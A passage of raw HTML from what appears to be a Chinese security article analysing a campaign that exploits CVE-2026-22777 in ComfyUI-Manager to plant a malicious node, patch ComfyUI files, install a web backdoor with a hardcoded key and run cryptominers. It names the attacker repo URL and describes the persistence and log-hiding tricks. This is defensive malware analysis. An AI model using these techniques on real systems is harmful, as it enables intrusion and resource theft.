GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti1pjw"><span leaf="">本文以2026-01-10版kalost-installer-fdf951c790a5作分析，其利用CVE-2026-22777入侵并传播挖矿木马的攻击流程图如下。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6394335511982571" data-s="300,640" data-type="png" data-w="918" type="block" data-imgfileid="100024317" src="https://wechat2rss.xlab.app/img-proxy/?k=1b8c271f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXK0NQdxWjLdOOuDKNPtBt74kfK2jicUgEAPC15LfaJ1EkyoH3aArmZDuia69dltZf3ukyPWfPyvv4hRhf4Ayzuf35MRic7EV39VWM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: left;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwsdhs1aqb" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwsdhadll" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span textstyle="" style="font-weight: bold;">4.1</span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwsdha21ie"><span leaf="">漏洞利用</span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span mpa-font-style="mmvulbti21k4" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-variant: normal;text-transform: none;"><span leaf="">攻击者在公网扫描暴露ComfyUI且运行含</span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">CVE-2026-22777</span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">漏洞的ComfyUI-Manager资产，利用此漏洞可在无需用户交互的情况下远程安装恶意自定义节点。下图是攻击者入侵后，被修改的ComfyUI-Manager配置文件config.ini截图，可看到security_level被修改为weak级别以允许安装任意来源插件。</span></span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5895140664961637" data-s="300,640" data-type="png" data-w="782" type="block" data-imgfileid="100024318" src="https://wechat2rss.xlab.app/img-proxy/?k=0c9cb27e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLP9I9YL9VzmLWcPdsHyMNa2iaor6a6iaB1nG0PN6rhmLQBugSu7NNbTD8jibfeSiaibaU2VPjzlChfj8crfPerXHBZrkLkhZgOn4n0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwskuseim" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwskud1ekz" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">如下是攻击者植入的恶意自定义节点asdfsdfpoc，项目地址:</span><span style="font-variant: normal;text-transform: none;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwskudob2"><span leaf=""><a href="http://fbyavpt7.requestrepo[.]com/asdfsdfpoc.git" target="_blank">http://fbyavpt7.requestrepo[.]com/asdfsdfpoc.git</a></span></span><span style="font-variant: normal;text-transform: none;"><span leaf="" mpa-font-style="mmwwskud19fo" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">。</span></span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024319" data-ratio="0.44194107452339687" data-s="300,640" type="block" data-type="png" data-w="1154" src="https://wechat2rss.xlab.app/img-proxy/?k=2d8b5240&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLowlc7cc95CX2QEk4SpI1f20ich7hIG2pZou0sEEtBwz9IkqUVzd457NVgCGiaU9pibXYgM6T966p9Kf2Frp1Qdv8yxpqlCHs62Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwwstz82553" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mmwwstznnqj" data-pm-slice="0 0 []"><span leaf="">值得注意的是，恶意节点asdfsdfpoc中的文件__init.py__、install.py（即本次攻击事件中的injector.py）在安装过程中便立即执行。为阻碍溯源分析工作，攻击者删除了该节点下的Python脚本（只剩一个.git文件夹），虽然ComfyUI重启后，恶意节点asdfsdfpoc因缺少__init.py__.py而导入失败，但不影响injector.py生成的恶意脚本execution.py正常执行。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6616038882138517" data-s="300,640" data-type="png" data-w="1646" type="block" data-imgfileid="100024320" src="https://wechat2rss.xlab.app/img-proxy/?k=abadcef2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKXvV15KEibjoiaeGBHhXibItJxxqB6ib36gREKcqgKO0jgvzXIt0MvloUa3TAmRBySyRPSE2rxybuYQv24tumGZogNeP7xG8XXXlc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwt61f21x9" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwt60yvjt" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span textstyle="" style="font-weight: bold;">4.2</span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwt60yiqk"><span leaf="">木马源头 —— 注入器injector.py</span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbtiqkj"><span leaf="">注入器injector.py主要实现以下功能：</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mmwuf5gg1b8c" data-pm-slice="0 0 []"><div style="width: 100%;padding: 0 18px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;background: rgb(255, 255, 255);border-radius: 2px;border: 1px solid rgb(190, 25, 31);text-align: left;padding: 14px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mmwufw291v4v" data-pm-slice="0 0 []"><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l1mh0" style="font-size: 16px;">1）查找ComfyUI根目录，继而读取原始的execution.py、server.py；</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l1pfd" style="font-size: 16px;">2）安装必需的pip包；</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l1zv2" style="font-size: 16px;">3）首次运行时，备份正常的execution.py、server.py；</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l230" style="font-size: 16px;">4）下载session_utils.py（ComfyUI后门脚本）；</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1lawe" style="font-size: 16px;">5）下载init.py覆写自定义节点srl-nodes的__init__.py以加载injector.py实现持久化</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l1359" style="font-size: 16px;">6）生成patch后的execution.py、server.py；</span></p><p yb-mpa-mark="mark-style-text" style="font-size: 14px;color: #333333;line-height: 24px;word-break: break-word;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mmwufw1l1h83" style="font-size: 16px;">7）下载并运行挖矿进程守护程序watch_dog。</span></p></div></div></div></div><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbtiaal"><span leaf="">需要注意的是，injector.py采用了输出重定向技术，通过将关键输出重定向到内存缓冲区中以隐藏敏感日志输出。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5936254980079682" data-s="300,640" data-type="png" data-w="753" type="block" data-imgfileid="100024321" src="https://wechat2rss.xlab.app/img-proxy/?k=4878a763&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKX9mMNsE5zZfKgLdCus14pSibPms2ffKDtqAXQaX3SGkiaOX1ZicqdwRRRIp8ydBxXe5HvxIeh8ymbreyKHcnibK7M38GxX76Xhf0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwtdpoj89" data-pm-slice="0 0 []"><span mpa-font-style="mmwvz6pw19j7" style="font-size: 17px;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwtdpa1gtb"><span leaf="">4.2.1</span></span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-size: 17px;" mpa-font-style="mmwvz6pwsbi"><span leaf="" mpa-font-style="mmwwtdpa1exs" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">覆写自定义节点srl-nodes</span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span mpa-font-style="mmvulbti1e8v" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-variant: normal;text-transform: none;"><span leaf="">srl-nodes</span></span><span style="font-variant: normal;text-transform: none;" data-mpa-action-id="mmwugrr413m2" data-pm-slice="0 0 []"><span mpa-font-style="mmwugrqko40"><sup leaf="" mpa-font-style="mmwugsd019wi" data-mpa-action-id="mmwugsdsnuc" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 128, 255);">[4]</span></span></sup></span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">是一个允许执行任意代码的ComfyUI自定义节点，injector.py执行后会从攻击者代码托管平台下载init.py以覆写自定义节点srl-nodes（不存在则主动创建）的__init__.py，从而加载injector.py（以 </span></span><span style="font-variant: normal;text-transform: none;font-style: italic;"><span leaf="">#FUCK_PUTIN </span></span><span style="font-variant: normal;text-transform: none;"><span leaf="">打头）实现持久化，替换前后对比如下：</span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3781710914454277" data-s="300,640" data-type="png" data-w="1695" type="block" data-imgfileid="100024322" src="https://wechat2rss.xlab.app/img-proxy/?k=c017f91e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKN7TU4ds957kjbTzumutkf8e42ek7H6a0aexyQcW0a4eq8gFkvKs175MhkFfjtUMawDSwSORQRAyBXUiaEw2CMsa5lLcKibQeaY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span data-mpa-action-id="mmwwtk8z1cre" data-pm-slice="0 0 []"><span leaf="">值得注意的是，若custom_nodes中本身就安装了自定义节点srl-nodes，由于替换前后目录表未改变，文件夹srl-nodes的修改日期仍是其最初安装时间，这一点非常隐蔽。<img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.41823899371069184" data-s="300,640" data-type="png" data-w="636" type="block" data-imgfileid="100024323" src="https://wechat2rss.xlab.app/img-proxy/?k=b316b4c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKop4sDhxBAUyV2knARNtp2g00R0Yzq3lqWqvuIicYK059OzUVWUzIzoPF0Fh6X9OZt23cwQYszPTiabwzTbPxxxIWGxfXibzT7Uo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwu0sv1m9p" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwu0se23qz" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span textstyle="" style="font-weight: bold;">4.2.2</span></span><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwu0se1z12"><span leaf="">patch后的execution.py</span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti1k3t"><span leaf="">攻击者在ComfyUI原始的execution.py基础上注入了挖矿信息（即填充了钱包地址的miner_manager.py），并增加了矿工管理函数manage_miner()，注入前后对比如下：</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024324" data-ratio="0.47759562841530057" data-s="300,640" type="block" data-type="png" data-w="1830" src="https://wechat2rss.xlab.app/img-proxy/?k=972c260f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKSzicHibOdbTvJldE4NWJ73w7OwPO7LZ3dKP1KbdjdabRhTbe2GiahwPRygZVJPBrcdb6Xyo9iaFOB0C2R0WXF46xyEatpD2GTic0c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwwu7mppq4" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mmwwu7n51ji4" data-pm-slice="0 0 []"><span leaf="">需要注意的是，execution.py中的外层函数在import execution时便执行，且先于manage_miner(action)执行。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100024325" data-ratio="0.6693467336683417" data-s="300,640" type="block" data-type="png" data-w="995" src="https://wechat2rss.xlab.app/img-proxy/?k=138327fb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXK1W3yL6pVeNyyKicDFXrK6HPIMacNPvVK1pbAFLlTiav46icBRv9libUsH9waM8cJbt2licWEuvqaUiaEh9Dzry5CYzXI1uvtia0iaKN8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: justify;margin-left: 0pt;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwujva165i" data-pm-slice="0 0 []"><span mpa-font-style="mmwvyrzb15al" style="font-size: 17px;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwujuv4vg"><span leaf="">4.2.3</span></span></span><span style="font-weight: bold;font-size: 17px;" mpa-font-style="mmwvyrzb1o77"><span leaf="" mpa-font-style="mmwwujuv4p1" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">patch后的sever.py</span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbtin4h"><span leaf="">patch后的sever.py相比原始版本引入了后门脚本session_utils.py，并在PromptServer类的add_routes()尾部添加攻击代码session_utils.setup_routes(self.app)，注入前后对比如下：</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.05652173913043478" data-s="300,640" data-type="png" data-w="920" type="block" data-imgfileid="100024326" src="https://wechat2rss.xlab.app/img-proxy/?k=23a4bc79&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKpiar2xNgibF4LQBADSHaB8Uu6W0mfU5RWXRTdGKeb4pQyq6jTJsnkDibOn55PiaZKcy9yU36JNiaPIibyzhoWnTsgaVjuYyibu5HZhs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwvyc52fyn" style="font-size: 16px;" data-mpa-action-id="mmwvyc5abv4" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwvyj0621ks" style="font-size: 17px;">下图是ComfyUI根目录下最终安装的恶意模块，execution.py、server.py会在ComfyUI重新启动时自动加载。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.34822804314329736" data-s="300,640" data-type="png" data-w="649" type="block" data-imgfileid="100024328" src="https://wechat2rss.xlab.app/img-proxy/?k=cb1a2ce2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIn6z2ysLISEwdwjqpl5rBSlxHibyP2UdZ7hpY7u82lBHZTvvQT0qKVLKQzDFWjYkqmBsDTbyDcefZJPico12LF2KqtOaF8Auzgo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwupp8cnc" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwuporc7" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span textstyle="" style="font-weight: bold;">4.3</span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwupor7hh"><span leaf="">ComfyUI后门 —— session_utils.py</span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti75d"><span leaf="">session_utils.py为ComfyUI添加了一个功能强大的后门，实现了基于Cookie的会话认证机制，并允许授权用户通过Web界面完全控制系统。攻击者还内置了硬编码的后门密钥“hitler1488”。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6614238410596026" data-s="300,640" data-type="png" data-w="1208" type="block" data-imgfileid="100024329" src="https://wechat2rss.xlab.app/img-proxy/?k=f786d7cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIJ6Y8dbz6Tehmq5QiaictAnGlQYxsTPE96CBaXHFC8SBticiaJkfxH6qx98JyGWSQSBXZxc8D59Kc1j0GTrhwfCjljBdvBErBTMWw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;"><span mpa-font-style="mmwwuvu7mqa" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mmwwuvuoevs" data-pm-slice="0 0 []"><span leaf="">session_utils.py还允许使用run_shell_command_sync()函数执行命令： cd命令切换目录、通过subprocess.run()执行其他命令。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.31584062196307094" data-s="300,640" data-type="png" data-w="1029" type="block" data-imgfileid="100024330" src="https://wechat2rss.xlab.app/img-proxy/?k=5b83313f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJP8x1bnhX3Uo9GAESvM8N7liciaia6R84AOfDQGM9FOMmooXdDSlNrX76uJBEib2SY8ADV999rw8VKwDDcCd4icEy6638BJ2VxdKfA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;margin-bottom: 16px;line-height: 1.6em;margin-top: 16px;text-align: justify;"><span style="font-family: 仿宋;font-variant: normal;text-transform: none;" data-mpa-action-id="mmwwv4wm831" data-pm-slice="0 0 []"><span leaf="" mpa-font-style="mmwwv4w51mpe" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span textstyle="" style="font-weight: bold;">4.4</span></span><span style="font-variant: normal;text-transform: none;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mmwwv4w614vu"><span leaf="">矿工管理器miner_manager.py</span></span></span></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 2em;line-height: 1.6em;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-bottom: 16px;margin-top: 16px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-variant: normal;text-transform: none;font-size: 17px;" mpa-font-style="mmvulbti1xmt"><span leaf="">miner_manager.py主要用于下载挖矿脚本，继而下载XMRig、LolMiner、TrexMiner等矿工进行挖矿牟利。</span></span><o:page></o:page></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7741935483870968" data-s="300,640" data-type="png" data-w="806" type="block" data-imgfileid="100024331" 